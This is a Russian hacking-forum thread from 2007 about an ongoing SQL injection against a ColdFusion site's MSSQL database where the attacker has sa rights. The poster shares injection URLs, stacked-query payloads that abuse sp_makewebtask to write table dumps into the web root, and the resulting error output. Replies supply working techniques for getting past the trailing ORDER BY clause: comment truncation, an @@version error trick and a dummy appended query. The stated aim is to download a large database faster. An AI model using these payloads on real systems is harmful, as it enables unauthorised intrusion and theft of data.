Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   как закрыть order в запросе к mssql (https://forum.antichat.xyz/showthread.php?t=48884)

$jason$ 12.09.2007 20:20
как закрыть order в запросе к mssql
 
Всем привет! подскажите как закрыть 'Order'

инъекция в cfm скрипте,все таблицы ,колонки и т.д даёт нормально,права sa

хочу вывести таблицу в файл на сервере с помощью sp_makewebtask, в вебдиректорию

в сообщение о ошибке есть полный путь до вебдиры,и запрос к бд

Код:
site.com/dir/news.cfm?news_id=-1'
Код:
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''.
The error occurred in F:\www\site.com\www\dir\news.cfm: line 19
SQL          SELECT * From News Where News_ID = -1'' Order By DisplayOrder

делаю запрос
Код:
http://site.com/dir/news.cfm?News_ID=1;%20EXEC%20master..sp_makewebtask%20%22F:\www\site.com\www\dir\output.html%22,%20%22SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES%22
Код:
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'Order'.
 
The error occurred in F:\www\site.com\www\dir\news.cfm: line 19

SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" Order By DisplayOrder
как закрыть этот ордер? повсякому пробовал пока неполучилось, проверяю потом site.com/dir/output.html нету файла :(

Spyder 12.09.2007 20:23
закоментировать не пробовал?

[53x]Shadow 12.09.2007 20:23
Используй усечение запроса комментами "--"(два тире), ставь в конце своего запроса

$jason$ 12.09.2007 21:38
пробовал запрос становится вида
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''.

Код:
SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"-- Order By DisplayOrder
в файл невыводит :(

$jason$ 12.09.2007 23:49
никто незнает чтоли?

[53x]Shadow 13.09.2007 00:06
Цитата:
Сообщение от $jason$
никто незнает чтоли?
Фильтрация кавычек там, читай статью [cash] до конца и все последующие посты!
https://forum.antichat.ru/thread30501.html
здесь непосредственно про обход кавычек
https://forum.antichat.ru/threadnav30501-3-10.html

guest3297 13.09.2007 01:06
подставь 1+or+1=@@version--

$jason$ 13.09.2007 17:13
Цитата:
Сообщение от [ cash ]
подставь 1+or+1=@@version--
да всё прикрасно выводит и версию и всю нужную инфу из базы, там просто база объёмная т.е много инфы нужно скачать, я даж таблицу создал и там две колонки первая id вторая вся нужная мне инфа но скрипт который построчно сливает долго сливает всёравно(там сервак немного тормозной), я хочу побыстрей всё скачать просто ,но немогу правильно заюзать sp_makewebtask, раньше пробовал на других серверах всё получалось, а тут запрос каварный какой-то несоображу как ордер закрыть

guest3297 14.09.2007 03:29
А те путь известен?
Вообще не факт что ты trptr исполнять можешь лей не спеша и потихоньку...

Scipio 14.09.2007 03:44
поробуй сделать "фейковый" запрос

тогда запрос у тебя будет типа такого:
Код:
News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"; SELECT * From News Where News_ID = 1
а Order By DisplayOrder скрипт сам подставит и ошибки не будет


Время: 21:35
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице